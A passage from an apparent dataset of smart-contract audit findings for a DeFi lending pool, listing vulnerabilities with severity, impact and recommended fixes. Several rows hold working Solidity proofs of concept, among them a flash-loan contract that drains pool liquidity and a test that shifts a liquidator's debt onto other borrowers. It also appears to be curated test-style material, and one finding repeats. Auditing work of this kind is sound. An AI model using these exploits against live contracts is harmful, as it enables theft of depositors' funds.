vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n" +fund loss because calculated Interest would be 0 in getCurrentState() due to division error,medium,"function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.",don't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.,borrowers won't pay any interest and lenders would lose funds.,"```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n" +"A liquidator can gain not only collateral, but also can reduce his own debt!",medium,"A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n","We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, ""Pool: borrower not liquidatable"");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n","A liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.","```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n" +Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs,high,"When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.",userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points,Some token pairs will always be/will become broken,"```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n" +"A liquidator can gain not only collateral, but also can reduce his own debt!",medium,"A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owe 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n","We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, ""Pool: borrower not liquidatable"");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n","A liquidator can gain not only collateral, but also can reduce his own debt. Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.","```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n" +Users can borrow all loan tokens,medium,"Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Pool.sol"";\\nimport ""../src/Factory.sol"";\\nimport ""./mocks/Borrower.sol"";\\nimport ""./mocks/ERC20.sol"";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), ""G"");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n",A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.,"The vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is 